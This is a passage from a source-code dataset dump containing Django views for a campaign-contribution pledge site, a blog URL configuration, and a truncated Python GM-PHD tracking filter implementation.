valid.\n#\n# Also record every email address users enter so we can follow-up\n# if the user did not finish the pledge form.\n@csrf_exempt # for testing via curl\n@require_http_methods([\"POST\"])\ndef validate_email(request):\n\tfrom itfsite.models import User, Campaign\n\tfrom email_validator import validate_email, EmailNotValidError\n\n\temail = request.POST['email'].strip()\n\n\t# Validate the email address. If it is invalid, return the\n\t# error message. See create_pledge below - we repeat this\n\t# as server-slide validation again.\n\ttry:\n\t\t\t # DE does not accept internationalized addresses\n\t\t\t # during testing, don't check deliverability so that tests can operate off-line\n\t\tvalidate_email(email, allow_smtputf8=False, check_deliverability=settings.VALIDATE_EMAIL_DELIVERABILITY)\n\texcept EmailNotValidError as e:\n\t\treturn HttpResponse(str(e), content_type=\"text/plain\")\n\n\tif not User.objects.filter(email=email).exists():\n\t\t# Store for later, if this is not a user already with an account.\n\t\t# We store a max of one per email address.\n\t\tIncompletePledge.objects.get_or_create(\n\t\t\temail=email,\n\t\t\tdefaults={\n\t\t\t\t\"trigger\": Trigger.objects.get(id=request.POST['trigger']),\n\t\t\t\t\"via_campaign\": Campaign.objects.get(id=request.POST['via_campaign']),\n\t\t\t\t\"extra\": {\n\t\t\t\t\t\"desired_outcome\": request.POST['desired_outcome'],\n\t\t\t\t\t\"ref_code\": get_sanitized_ref_code(request),\n\t\t\t\t}\n\t\t\t})\n\n\treturn HttpResponse(\"OK\", content_type=\"text/plain\")\n\n@require_http_methods(['POST'])\n@json_response\ndef submit(request):\n\ttry:\n\t\t# Create an un-saved Pledge instance. If the user is anonymous,\n\t\t# it may create an AnonymousUser instance and associate with the\n\t\t# user's session.\n\t\tp = create_pledge_object(request)\n\n\t\t# If the Trigger is executed, validate that there are going\n\t\t# to be any recipients.\n\t\tif p.trigger.status == TriggerStatus.Executed:\n\t\t\tfrom contrib.bizlogic import get_pledge_recipients\n\t\t\tif len(get_pledge_recipients(p)) == 0:\n\t\t\t\treturn { \"status\": \"error\", \"message\": \"The filters you chose have eliminated all possible recipients!\" }\n\n\t\t# Get contributor info, save, and run a credit card\n\t\t# authorization.\n\t\tif not reuse_authorized_contributorinfo(p, request):\n\t\t\tsave_and_authorize_contributorinfo(p, request)\n\n\texcept HumanReadableValidationError as e:\n\t\treturn { \"status\": \"error\", \"message\": str(e) }\n\texcept AlreadyPledgedError as e:\n\t\treturn { \"status\": \"already-pledged\" }\n\n\t# If the Trigger has been executed and possibly other conditions are met, then we\n\t# can execute the Pledge immediately.\n\tif p.can_execute():\n\t\t# refresh the object - it's confused now because we pulled it\n\t\t# out of a transaction? lots of weird errors with Sqlite\n\t\tp = Pledge.objects.get(id=p.id)\n\t\tp.execute()\n\t\tp = Pledge.objects.get(id=p.id) # refresh again\n\n\t# If the user is anonymous...\n\tif not p.user:\n\t\t# The pledge needs to get confirmation of the user's email address,\n\t\t# which will lead to account creation. We must do this after pledge\n\t\t# execution so that the email that is sent knows the status of the\n\t\t# pledge.\n\t\tp.anon_user.send_email_confirmation()\n\n\t\t# Wipe the IncompletePledge because the user finished the form.\n\t\tIncompletePledge.objects.filter(email=p.anon_user.email, trigger=p.trigger).delete()\n\n\t# Done.\n\treturn {\n\t\t\"status\": \"ok\",\n\t\t\"html\": render_pledge_template(request, p, p.via_campaign, response_page=True),\n\t}\n\ndef get_sanitized_ref_code(request):\n\tref_code = request.POST['ref_code']\n\tif ref_code is not None:\n\t\tif ref_code.strip().lower() in (\"\", \"none\"):\n\t\t\tref_code = None\n\treturn ref_code\n\n@transaction.atomic\ndef update_pledge_profiles(newest_pledge):\n\t# When a Pledge is created with new profile information, all\n\t# of the user's still-open Pledges are updated to use the new\n\t# profile.\n\n\t# Get all of the user's open pledges, excluding p.\n\tpledges = Pledge.objects\\\n\t\t.filter(status=PledgeStatus.Open)\\\n\t\t.exclude(id=newest_pledge.id)\n\tif newest_pledge.user:\n\t\tpledges = pledges.filter(user=newest_pledge.user)\n\telse:\n\t\tpledges = pledges.filter(anon_user=newest_pledge.anon_user)\n\n\t# Lock.\n\tpledges = pledges.select_for_update()\n\n\t# Get existing ContributorInfos on those pledges.\n\tprev_profiles = set(p.profile for p in pledges)\n\n\t# Update the open pledges to new profile.\n\tpledges.update(profile=newest_pledge.profile)\n\n\t# Delete any of the previous ContributorInfos that are no longer needed.\n\t# (Some may be used on non-open Pledges and cannot be deleted.)\n\tfor ci in prev_profiles:\n\t\tif ci.can_delete():\n\t\t\tci.delete()\n\nclass InvalidArgumentError(Exception):\n\tpass\n\nclass AlreadyPledgedError(Exception):\n\tdef __init__(self, existing_pledge):\n\t\tself.existing_pledge = existing_pledge\n\ndef create_pledge_object(request):\n\t# Creates an un-saved Pledge instance.\n\t#\n\t# Raises an AlreadyPledgedError if the user has already made a Pledge\n\t# for the specified Trigger.\n\n\tp = Pledge()\n\n\t# trigger\n\n\ttry:\n\t\tp.trigger = Trigger.objects.get(id=request.POST['trigger'])\n\texcept Trigger.DoesNotExist:\n\t\traise InvalidArgumentError(\"The trigger ID is invalid.\")\n\tif p.trigger.status == TriggerStatus.Draft:\n\t\traise InvalidArgumentError(\"This trigger is still a draft. A contribution cannot yet be made.\")\n\telif p.trigger.status not in (TriggerStatus.Open, TriggerStatus.Executed):\n\t\traise InvalidArgumentError(\"This trigger is in the wrong state to make a contribution.\")\n\n\tp.made_after_trigger_execution = (p.trigger.status == TriggerStatus.Executed)\n\n\t# ref_code (i.e. utm_campaign code) and Campaign ('via_campaign')\n\n\tfrom itfsite.models import Campaign, AnonymousUser\n\tp.ref_code = get_sanitized_ref_code(request)\n\tp.via_campaign = Campaign.objects.get(id=request.POST['via_campaign'])\n\n\t# user / anon_user\n\n\tif request.user.is_authenticated():\n\t\t# This is an authentiated user.\n\t\tp.user = request.user\n\t\texists_filters = { 'user': p.user }\n\n\telse:\n\t\t# This is an anonymous user.\n\t\temail = request.POST.get('email').strip()\n\n\t\t# If the user makes multiple actions anonymously, we'll associate\n\t\t# a single AnonymousUser instance with all of the Pledges.\n\t\tanon_user = AnonymousUser.objects.filter(id=request.session.get(\"anonymous-user\")).first()\n\t\tif anon_user and anon_user.email == email:\n\t\t\t# Reuse this AnonymousUser instance.\n\t\t\tp.anon_user = anon_user\n\t\telse:\n\t\t\t# Validate email. See our function validate_email above.\n\t\t\tfrom email_validator import validate_email, EmailNotValidError\n\t\t\ttry:\n\t\t\t\tvalidate_email(email, allow_smtputf8=False, check_deliverability=settings.VALIDATE_EMAIL_DELIVERABILITY)\n\t\t\texcept EmailNotValidError as e:\n\t\t\t\traise HumanReadableValidationError(str(e))\n\n\t\t\t# Create a new AnonymousUser instance.\n\t\t\tp.anon_user = AnonymousUser.objects.create(email=email)\n\n\t\t\t# Record in the session so the user can reuse this instance and\n\t\t\t# to grant the user temporary (within the session cookie's session)\n\t\t\t# access to the resources the user creates while anonymous.\n\t\t\trequest.session['anonymous-user'] = p.anon_user.id\n\n\t\texists_filters = { 'anon_user': p.anon_user }\n\n\t# If the user has already made this pledge, it is probably a\n\t# synchronization problem. Just redirect to that pledge.\n\tp_exist = Pledge.objects.filter(trigger=p.trigger, **exists_filters).first()\n\tif p_exist is not None:\n\t\traise AlreadyPledgedError(p_exist)\n\n\t# Field values & validation.\n\n\tdef set_field(model_field, form_field, converter):\n\t\ttry:\n\t\t\tsetattr(p, model_field, converter(request.POST[form_field]))\n\t\texcept ValueError:\n\t\t\traise InvalidArgumentError(\"%s is out of range\" % form_field)\n\n\tset_field('algorithm', 'algorithm', int)\n\tset_field('desired_outcome', 'desired_outcome', int)\n\tset_field('incumb_challgr', 'incumb_challgr', int) # -1, 0, 1 --- but one day we want a slider so model field is a float\n\tset_field('amount', 'amount', decimal.Decimal)\n\tif request.POST.get(\"contribTipOrg\"):\n\t\tset_field('tip_to_campaign_owner', 'tip_amount', decimal.Decimal)\n\n\tif request.POST['filter_party'] in ('DR', 'RD'):\n\t\tp.filter_party = None # no filter\n\telse:\n\t\tp.filter_party = ActorParty.from_letter(request.POST['filter_party'])\n\n\t# Validation. Some are checked client side, so errors are internal\n\t# error conditions and not validation problems to show the user.\n\tif p.algorithm != Pledge.current_algorithm()[\"id\"]:\n\t\traise InvalidArgumentError(\"algorithm is out of range\")\n\tif not (0 <= p.desired_outcome < len(p.trigger.outcomes)):\n\t\traise InvalidArgumentError(\"desired_outcome is out of range\")\n\tif not (p.trigger.get_minimum_pledge() <= p.amount <= Pledge.current_algorithm()[\"max_contrib\"]):\n\t\traise InvalidArgumentError(\"amount is out of range\")\n\tif p.incumb_challgr not in (-1, 0, 1):\n\t\traise InvalidArgumentError(\"incumb_challgr is out of range\")\n\tif p.filter_party == ActorParty.Independent:\n\t\traise InvalidArgumentError(\"filter_party is out of range\")\n\tif p.tip_to_campaign_owner < 0:\n\t\traise InvalidArgumentError(\"tip_to_campaign_owner is out of range\")\n\tif p.tip_to_campaign_owner > 0 and (not p.via_campaign.owner or not p.via_campaign.owner.de_recip_id):\n\t\traise InvalidArgumentError(\"tip_to_campaign_owner cannot be non-zero\")\n\tif (p.trigger.trigger_type.extra or {}).get(\"monovalent\") and p.incumb_challgr != 0:\n\t\t# With a monovalent trigger, Actors only ever take outcome zero.\n\t\t# Therefore not all filters make sense. A pledge cannot be filtered\n\t\t# to incumbents who take action 1 or to the opponents of actors\n\t\t# who do not take action 0.\n\t\traise InvalidArgumentError(\"monovalent triggers do not permit an incumbent/challenger filter\")\n\n\ttcust = TriggerCustomization.objects.filter(owner=p.via_campaign.owner, trigger=p.trigger).first()\n\tif tcust and tcust.incumb_challgr and p.incumb_challgr != tcust.incumb_challgr:\n\t\traise InvalidArgumentError(\"incumb_challgr is out of range (campaign customization)\")\n\tif tcust and tcust.filter_party and p.filter_party != tcust.filter_party:\n\t\traise InvalidArgumentError(\"filter_party is out of range (campaign customization)\")\n\n\tp.extra = { }\n\n\t# If the Trigger was a super-trigger, copy in the sub-triggers to the Pledge,\n\t# indicating the desired outcome of each sub-trigger through the outcome-map\n\t# on the Trigger.\n\tif p.trigger.extra and \"subtriggers\" in p.trigger.extra:\n\t\tp.extra[\"triggers\"] = [\n\t\t\t[rec[\"trigger\"], rec[\"outcome-map\"][p.desired_outcome]]\n\t\t\tfor rec\n\t\t\tin p.trigger.extra[\"subtriggers\"]\n\t\t]\n\n\treturn p\n\ndef save_and_authorize_contributorinfo(p, request):\n\t# Save the user's information to a ContributorInfo object, save the Pledge,\n\t# and run a credit card authorization to get a token that we can use to\n\t# make a charge later.\n\n\t# If the credit card authorization fails, roll back and don't save the Pledge\n\t# or the ContributorInfo.\n\twith transaction.atomic():\n\n\t\t# Create a new ContributorInfo record from the submitted info.\n\t\tcontribdata = { }\n\n\t\t# string fields that go straight into the extras dict.\n\t\tcontribdata['contributor'] = { }\n\t\tfor field in (\n\t\t\t'contribNameFirst', 'contribNameLast',\n\t\t\t'contribAddress', 'contribCity', 'contribState', 'contribZip',\n\t\t\t'contribOccupation', 'contribEmployer'):\n\t\t\tcontribdata['contributor'][field] = request.POST[field].strip()\n\t\t\t\n\t\t# Validate & store the billing fields.\n\t\t#\n\t\t# (Including the expiration date so that we can know that a\n\t\t# card has expired prior to using the DE token at a later time.)\n\t\tccnum = request.POST['billingCCNum'].replace(\" \", \"\").strip() # Stripe's javascript inserts spaces\n\t\tccexpmonth = int(request.POST['billingCCExpMonth'])\n\t\tccexpyear = int(request.POST['billingCCExpYear'])\n\t\tcccvc = request.POST['billingCCCVC'].strip()\n\t\tcontribdata['billing'] = {\n\t\t\t'cc_num': ccnum, # is hashed before going into database\n\t\t\t'cc_exp_month': ccexpmonth,\n\t\t\t'cc_exp_year': ccexpyear,\n\t\t}\n\n\t\t# Create a ContributorInfo instance. We need a saved instance\n\t\t# so we can assign it to the pledge (the profile field is NOT NULL).\n\t\t# It's saved again below.\n\t\tci = ContributorInfo.objects.create()\n\t\tci.set_from(contribdata)\n\n\t\t# Save. We need a Pledge ID to form an authorization test.\n\t\tp.profile = ci\n\t\tp.save()\n\n\t\t# If the user has other open pledges, update their profiles to the new\n\t\t# ContributorInfo instance --- i.e. update their contributor and payment\n\t\t# info.\n\t\tupdate_pledge_profiles(p)\n\n\t\t# For logging:\n\t\t# Add information from the HTTP request in case we need to\n\t\t# block IPs or something.\n\t\taux_data = {\n\t\t\t\"httprequest\": { k: request.META.get(k) for k in ('REMOTE_ADDR', 'REQUEST_URI', 'HTTP_USER_AGENT') },\n\t\t}\n\n\t\t# Perform an authorization test on the credit card and store some CC\n\t\t# details in the ContributorInfo object.\n\t\t#\n\t\t# This may raise all sorts of exceptions, which will cause the database\n\t\t# transaction to roll back. A HumanReadableValidationError will be caught\n\t\t# in the calling function and shown to the user. Other exceptions will\n\t\t# just generate generic unhandled error messages.\n\t\t#\n\t\t# Note that any exception after this point is okay because the authorization\n\t\t# will expire on its own anyway.\n\t\trun_authorization_test(p, ccnum, cccvc, aux_data)\n\n\t\t# Re-save the ContributorInfo instance now that it has the CC token.\n\t\tci.save(override_immutable_check=True)\n\ndef reuse_authorized_contributorinfo(p, request):\n\t# See if the user wants to re-use an existing ContributorInfo that\n\t# has a credit card token already in it that we can use.\n\tif not request.POST[\"copyFromPledge\"]:\n\t\treturn False\n\n\telse:\n\t\t# This is a returning user and we are re-using info from a previous pledge.\n\t\t# That pledge might be one that hasn't had its email address confirmed yet,\n\t\t# or if it has the user might not be logged in, but the user's session cookie\n\t\t# may grant the user access to it. Or if the user is logged in, it might be\n\t\t# a pledge tied to the account.\n\t\tprev_p = Pledge.objects.get(id=request.POST[\"copyFromPledge\"])\n\t\tif not get_user_pledges(p.user, request).filter(id=prev_p.id).exists():\n\t\t\traise InvalidArgumentError(\"copyFromPledge is set to a pledge ID that the user did not create or is no longer stored in their session.\")\n\t\tp.profile = prev_p.profile\n\t\tp.save()\n\t\treturn True\n\n@json_response\ndef cancel_pledge(request):\n\t# Get the pledge. Check authorization.\n\tp = Pledge.objects.get(id=request.POST['pledge'])\n\tif get_user_pledges(request.user, request).filter(id=p.id).exists():\n\t\ttry:\n\t\t\tp.delete()\n\t\texcept Exception as e:\n\t\t\treturn { \"status\": \"error\", \"message\": \"Could not cancel pledge: \" + str(e) }\n\t\treturn { \"status\": \"ok\" }\n\telse:\n\t\treturn { \"status\": \"error\", \"message\": \"You don't own that pledge.\" }\n\ndef render_pledge_template(request, pledge, campaign, show_long_title=False, response_page=False):\n\t# Get the user's pledges, if any, on any trigger tied to this campaign.\n\timport django.template\n\ttemplate = django.template.loader.get_template(\"contrib/contrib.html\")\n\t\n\tctx = {\n\t\t\"response_page\": response_page,\n\t\t\"show_long_title\": show_long_title,\n\t\t\"pledge\": pledge,\n\t\t\"campaign\": campaign,\n\t\t\"execution\": PledgeExecution.objects.filter(pledge=pledge).first(),\n\t\t\"contribs\": sorted(Contribution.objects.filter(pledge_execution__pledge=pledge).select_related(\"action\", \"recipient\"), key=lambda c : (c.recipient_type.value, c.action.name_sort)),\n\t\t\"share_url\": request.build_absolute_uri(pledge.via_campaign.get_short_url()),\n\t}\n\n\tfrom itfsite.middleware import get_branding\n\tctx.update(get_branding(request))\n\t\n\treturn template.render(ctx)\n\n@anonymous_view\ndef report(request):\n\tcontext = { }\n\tcontext.update(report_fetch_data(None, None))\n\treturn render(request, \"contrib/totals.html\", context)\n\ndef report_fetch_data(trigger, via_campaign):\n\tpledge_slice_fields = { }\n\tpledgeexec_slice_fields = { }\n\tca_slice_fields = { }\n\n\tif trigger:\n\t\tpledge_slice_fields[\"trigger\"] = trigger\n\t\ttry:\n\t\t\tte = trigger.execution\n\t\texcept TriggerExecution.DoesNotExist:\n\t\t\traise Http404(\"This trigger is not executed.\")\n\t\tif te.pledge_count_with_contribs == 0:\n\t\t\traise Http404(\"This trigger did not have any contributions.\")\n\t\tif te.pledge_count < .75 * trigger.pledge_count:\n\t\t\traise Http404(\"This trigger is still being executed.\")\n\t\tpledgeexec_slice_fields[\"trigger_execution\"] = te\n\t\tca_slice_fields[\"pledge_execution__trigger_execution\"] = te\n\n\tif via_campaign:\n\t\tpledge_slice_fields[\"via_campaign\"] = via_campaign\n\t\tpledgeexec_slice_fields[\"pledge__via_campaign\"] = via_campaign\n\t\tca_slice_fields[\"pledge_execution__pledge__via_campaign\"] = via_campaign\n\n\t# form response\n\tret = { }\n\n\t# number of pledges & users making pledges\n\tpledges = Pledge.objects.filter(**pledge_slice_fields)\n\tret[\"users_pledging\"] = pledges.exclude(user=None).values(\"user\").distinct().count()\n\tret[\"users_pledging_twice\"] = pledges.exclude(user=None).values(\"user\").annotate(count=Count('id')).filter(count__gt=1).count()\n\tret[\"pledges\"] = pledges.count()\n\tret[\"pledges_confirmed\"] = pledges.exclude(user=None).count()\n\tfrom django.db.models import Sum\n\tret[\"pledge_aggregate\"] = pledges.aggregate(amount=Sum('amount'))[\"amount\"]\n\n\t# number of executed pledges and users with executed pledges\n\tpledge_executions = PledgeExecution.objects.filter(problem=PledgeExecutionProblem.NoProblem, **pledgeexec_slice_fields)\n\tret[\"users\"] = pledge_executions.values(\"pledge__user\").distinct().count()\n\tret[\"num_triggers\"] = pledge_executions.values(\"trigger_execution\").distinct().count()\n\tif ret[\"num_triggers\"] > 0:\n\t\tret[\"first_contrib_date\"] = pledge_executions.order_by('created').first().created\n\t\tret[\"last_contrib_date\"] = pledge_executions.order_by('created').last().created\n\n\t# aggregate count and amount of campaign contributions\n\tret[\"total\"] = dict(zip([\"count\", \"total\"], Contribution.aggregate(**ca_slice_fields)))\n\tif ret[\"total\"][\"count\"] > 0:\n\t\tret[\"total\"][\"average\"] = ret[\"total\"][\"total\"] / ret[\"total\"][\"count\"]\n\n\tif trigger:\n\t\t# Aggregates by outcome. Return in the same order as Trigger.outcomes\n\t\t# (don't change that!).\n\t\tret['outcomes'] = []\n\t\toutcome_totals = dict(Contribution.aggregate('desired_outcome', **ca_slice_fields))\n\t\tfor outcome_index, outcome_info in enumerate(trigger.outcomes):\n\t\t\toutcome_total = outcome_totals.get((outcome_index,), (0, decimal.Decimal(0)))\n\t\t\tret['outcomes'].append({\n\t\t\t\t\"outcome\": outcome_index,\n\t\t\t\t\"label\": outcome_info['label'],\n\t\t\t\t\"total\": outcome_total[1],\n\t\t\t\t\"count\": outcome_total[0],\n\t\t\t})\n\n\t# Aggregates by actor.\n\tfrom collections import defaultdict\n\tret['actors'] = defaultdict(lambda : defaultdict( lambda : decimal.Decimal(0) ))\n\tfor ((action_or_actor, recipient_type), (count, total)) in Contribution.aggregate('action' if trigger else \"actor\", 'recipient_type', **ca_slice_fields):\n\t\tactor = action_or_actor.actor if trigger else action_or_actor\n\t\tret['actors'][actor.id]['actor'] = actor\n\t\tret['actors'][actor.id][recipient_type.name] += total\n\t\tif trigger: ret['actors'][actor.id]['action'] = action_or_actor\n\tret['actors'] = sorted(ret['actors'].values(), key = lambda x : (-(x['Incumbent'] - x['GeneralChallenger']), -x['Incumbent'], x['actor'].name_sort))\n\n\t# Aggregates by incumbent/chalenger.\n\tret['by_recipient_type'] = [\n\t\t{\n\t\t\t\"recipient_type\": recipient_type.name,\n\t\t\t\"count\": count,\n\t\t\t\"total\": total,\n\t\t}\n\t\tfor ((recipient_type,), (count, total))\n\t\tin Contribution.aggregate('recipient_type', **ca_slice_fields) ]\n\n\t# Aggregates by party.\n\tret['by_party'] = defaultdict( lambda : [0, decimal.Decimal(0)] )\n\tfor ((recipient,), (count, total)) in Contribution.aggregate('recipient', **ca_slice_fields):\n\t\tret['by_party'][recipient.party][0] += count\n\t\tret['by_party'][recipient.party][1] += total\n\tret['by_party'] = [ { \"party\": party, \"count\": count, \"total\": total } for (party, (count, total)) in ret['by_party'].items() ]\n\tret['by_party'].sort(key = lambda item : item[\"total\"], reverse=True)\n\n\t# report\n\treturn ret\n","sub_path":"contrib/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"134270093","text":"from django.urls import path\n\nfrom .views import blog, dashboard, feed, discover\n\nurlpatterns = [\n path('', blog.home, name='home'),\n path('accounts/delete/', dashboard.delete_user, name='user_delete'),\n path('dashboard/', dashboard.dashboard, name='dashboard'),\n path('dashboard/domain/', dashboard.domain_edit, name='domain'),\n path('dashboard/posts/', dashboard.posts_edit, name='post'),\n path('dashboard/posts/new/', dashboard.post_new, name='post_new'),\n path('dashboard/posts//', dashboard.post_edit, name='post_edit'),\n path('dashboard/posts//delete/', dashboard.PostDelete.as_view(),\n name='post_delete'),\n path('discover/', discover.discover, name='discover'),\n\n path('blog/', blog.posts, name='posts'),\n path('hit//', blog.post_hit, name='post_hit'),\n path(\"feed/\", feed.feed, name=\"post_feed\"),\n path('/', blog.post, name='post'),\n]\n","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"416240712","text":"import numpy as np\nfrom operator import itemgetter, attrgetter\nfrom scipy.stats import multivariate_normal\nimport math\n\n# !/usr/bin/env python\n# GM-PHD implementation in Python by Dan Stowell modified by Tommaso Fabbri\n#\n# Based on the description in Vo and Ma (2006).\n# (c) 2012 Dan Stowell and Queen Mary University of London.\n# (c) 2016 Tommaso Fabbri and University of Pisa - Automation & Robotics Laboratory\n\n# All rights reserved.\n#\n# NOTE: SPAWNING IS NOT IMPLEMENTED.\n\n\"\"\"\n\nThis file is part of gmphd, GM-PHD filter in python by Dan Stowell.\n\n gmphd is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n gmphd is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with gmphd. If not, see .\n\"\"\"\n\n\nclass GmphdComponent(object):\n \"\"\"\n GM-PHD Gaussian component.\n\n The Gaussian component is defined by:\n weight\n mean\n covariance\n id\n detect\n \"\"\"\n weight = 0\n mean = None\n cov = None\n uid = 5\n detect = False\n\n \n \n\n def __init__(self, weight, mean, cov, newid, detect=False):\n\n self.weight = np.float64(weight)\n self.mean = np.array(mean, dtype=np.float64)\n self.mean[2:] = 0\n self.cov = np.array(cov, dtype=np.float64)\n self.id = newid\n self.detect = detect\n\n #print self.mean.size\n\n # self.mean.resize((self.mean.size, 1))\n # self.cov.resize((self.mean.size, self.mean.size))\n\n def __repr__(self):\n str = '\\tWeight: {0}\\n\\tMean: {1}\\n\\tCovariance: {2}\\n\\tID: {3}\\n\\tDetect: {4}\\n'.format(self.weight, self.mean, self.cov, self.id, self.detect)\n return str\n\nclass GMPHD(object):\n def __str__(self):\n\n for i in self.gm:\n return i.__str__()\n\n def __init__(self, birthgmm, survival, detection, f, q, h, r, p0, clutter, merge_thresh, det_thresh=0.3):\n \"\"\"\n 'gm' list of GmphdComponent\n\n 'birthgmm' List of GmphdComponent items which makes up the GMM of birth probabilities.\n 'survival' Survival probability.\n 'detection' Detection probability.\n 'f' State transition matrix F.\n 'q' Process noise covariance Q.\n 'h' Observation matrix H.\n 'r' Observation noise covariance R.\n 'clutter' Clutter intensity.\n \"\"\"\n self.birth_w = 0.001 \n self.gm = []\n self.birthgmm = birthgmm\n\n self.survival = np.float64(survival) # p_{s,k}(x) in paper\n self.detection = np.float64(detection) # p_{d,k}(x) in paper\n \n self.merge_thresh = np.float64(merge_thresh)\n\n self.f = np.array(f, dtype=np.float64) # state transition matrix (F_k-1 in paper)\n self.q = np.array(q, dtype=np.float64) # process noise covariance (Q_k-1 in paper)\n self.h = np.array(h, dtype=np.float64) # observation matrix (H_k in paper)\n self.r = np.array(r, dtype=np.float64) # observation noise covariance (R_k in paper)\n\n self.clutter = np.float64(clutter) # clutter intensity (KAU in paper)\n self.initQ = np.array(p0, dtype=np.float64) # initial value of covariance matrix P_k\n \n self.prev_measures = np.zeros((4,1))\n self.det1 = det_thresh\n self.det2 = det_thresh/10\n\n \n\n\n\n def predict_existing(self, born_comps):\n # Prediction for existing targets\n repr(self.gm) \n\n predicted = [GmphdComponent(self.survival * comp.weight,\n np.dot(self.f, comp.mean),\n self.q + np.dot(np.dot(self.f, comp.cov), self.f.T),\n comp.id\n ) for comp in born_comps]\n return predicted\n\n def update(self, measures, predicted):\n # Construction of PHD update components\n #repr(predicted)\n\n # The 'predicted' components are kept, with a decay\n pr_gm = [GmphdComponent(comp.weight * (1.0 - self.detection),\n comp.mean, comp.cov, comp.id, detect=False) for comp in predicted]\n \n \n eta = [np.dot(self.h, comp.mean) for comp in predicted]\n #print 'Eta', eta\n s = [self.r + np.dot(np.dot(self.h, comp.cov), self.h.T) for comp in predicted]\n #print '++++S', s\n\n k = []\n for index, comp in enumerate(predicted):\n k.append(np.dot(np.dot(comp.cov, self.h.T), np.linalg.inv(s[index])))\n\n pkk = []\n for index, comp in enumerate(predicted):\n pkk.append(np.dot(np.eye(np.shape(k[index])[0]) - np.dot(k[index], self.h), comp.cov))\n\n # Update using the measures\n for i in np.ndindex(measures.shape[1]):\n z = measures[:2, i]\n temp_gm = []\n for j, comp in enumerate(predicted):\n '''\n# print \"===Z\", z.squeeze()\n# print 'ETA', eta[j].squeeze()\n# print 'S', s[j]\n# print 'd', np.linalg.norm(z-eta[j])\n ''' \n if np.linalg.norm(z-eta[j]) < 0.9: \n mvn = multivariate_normal(eta[j].squeeze(), s[j])\n mvn_result = mvn.pdf(z.squeeze())\n #print 'mvn', mvn_result \n #print 'weight', comp.weight * mvn_result \n temp_gm.append(GmphdComponent(\n #self.detection * comp.weight * mvn_result*5,\n comp.weight * mvn_result, \n comp.mean + np.dot(k[j], z - eta[j]), pkk[j], comp.id))# comp.cov))\n\n\n # The Kappa thing (clutter and reweight)\n weight_sum = np.sum(comp.weight for comp in temp_gm)\n \n if weight_sum != 0:\n weight_factor = 1.0 / (self.clutter + weight_sum)/1.1\n for comp in temp_gm:\n comp.weight *= weight_factor * self.detection\n pr_gm.extend(temp_gm)\n '''\n allid = np.array([comp.id for comp in pr_gm]) \n# print '--update:', allid\n allid = np.array([comp.weight for comp in pr_gm]) \n# print '--update:', allid \n ''' \n #pr_gm.extend(temp_gm) \n self.gm = pr_gm\n\n def run_iteration(self, measures):#, born_components):\n # Prediction for birthed targets\n #print('Measures: ')\n #print(measures)\n born = self.create_birth(self.prev_measures)\n #pr_born = self.predict_birth(born_components)\n # Prediction for existing targets\n predicted = self.predict_existing(born)\n# print 'Predict: ', len(predicted)\n #print('Predicted components:'.format(predicted))\n # Update\n self.update(measures, predicted)\n# print('Updated components:'.format(self.gm))\n# print len(self.gm)\n # Prune\n self.prune()\n# print('Pruning: '.format(self.gm))\n self.detect()\n #print 'Detect', len(self.gm_high)\n# print len(self.gm)\n self.prev_measures = measures\n\n \n def prune(self, truncation_thresh=1e-4, max_components=40):\n temp_sum_0 = np.sum([i.weight for i in self.gm])\n\n # Truncation step\n I = filter(lambda comp: comp.weight > truncation_thresh, self.gm)\n l = 0 # count the number of features/components\n pruned_gm = []\n '''\n allid = np.array([comp.id for comp in I]) \n# print '--prune:', allid\n allid = np.array([comp.weight for comp in I]) \n# print '--prune:', allid \n ''' \n # Merge step\n while len(I) > 0:\n l += 1\n j = np.argmax(i.weight for i in I)\n L = []\n indexes = []\n for index, i in enumerate(I):\n temp = np.dot((i.mean - I[j].mean).T, np.linalg.inv(i.cov+np.eye(4)*0.00001))\n mah_dist = np.float64(np.dot(temp, (i.mean - I[j].mean)))\n mindist = np.linalg.norm(i.mean[:2]-I[j].mean[:2]) \n #print '==cov', i.cov \n #print 'mah_dist', mah_dist\n #print 'min_dist', mindist\n if mindist <= self.merge_thresh: \n #if mah_dist <= self.merge_thresh:\n L.append(i)\n indexes.append(index)\n if len(L):\n temp_weight = np.sum([i.weight for i in L])\n temp_mean = (1.0 / temp_weight) * np.sum([i.weight * i.mean for i in L], axis=0)\n\n '''\n temp_cov = np.zeros((temp_mean.size, temp_mean.size))\n for i in L:\n #print 'TM', temp_mean\n #print i.mean\n temp_cov += (i.cov + np.dot((temp_mean - i.mean).T, (temp_mean - i.mean)))\n '''\n #imax = np.argmax([i.weight for i in L])\n temp_cov = I[j].cov #zquang: cov from the highest prob. component\n #print 'max', L[imax].weight, 'cov', temp_cov\n temp_id = I[j].id\n \n pruned_gm.append(GmphdComponent(temp_weight, temp_mean, temp_cov, temp_id))\n I = [i for j, i in enumerate(I) if j not in indexes]\n pruned_gm.sort(key=attrgetter('weight'))\n pruned_gm.reverse()\n pruned_gm = pruned_gm[:max_components]\n temp_sum_1 = np.sum(i.weight for i in pruned_gm)\n for i in pruned_gm:\n i.weight *= temp_sum_0 / temp_sum_1\n if i.weight > 1.5:\n i.weight = 1.5\n\n # tag name\n ''' \n allid = np.array([comp.id for comp in pruned_gm]) \n# print '++tag:', allid\n allid = np.array([comp.weight for comp in pruned_gm]) \n# print '++w:', allid \n ''' \n while(len(np.array([comp.id for comp in pruned_gm])) != len(np.unique(np.array([comp.id for comp in pruned_gm])))):\n allid = np.array([comp.id for comp in pruned_gm])\n uniqueid = np.unique(allid)\n for ii, comp in enumerate(pruned_gm):\n for jj, comp2 in enumerate(pruned_gm):\n if ii< jj and comp.id == comp2.id:\n allid = np.array([comp.id for comp in pruned_gm])\n allw = np.array([comp.weight for comp in pruned_gm])\n \n #print 'allid', allid\n newid = 1\n for ind in range(max(allid)+2):\n if min(abs(allid - ind)) > 0:\n newid = ind\n break\n #print 'newid', newid, ii, jj\n if pruned_gm[ii].weight > pruned_gm[jj].weight:\n pruned_gm[jj].id = newid\n else:\n pruned_gm[ii].id = newid\n \n break\n \n \n ''' \n allid = np.array([comp.id for 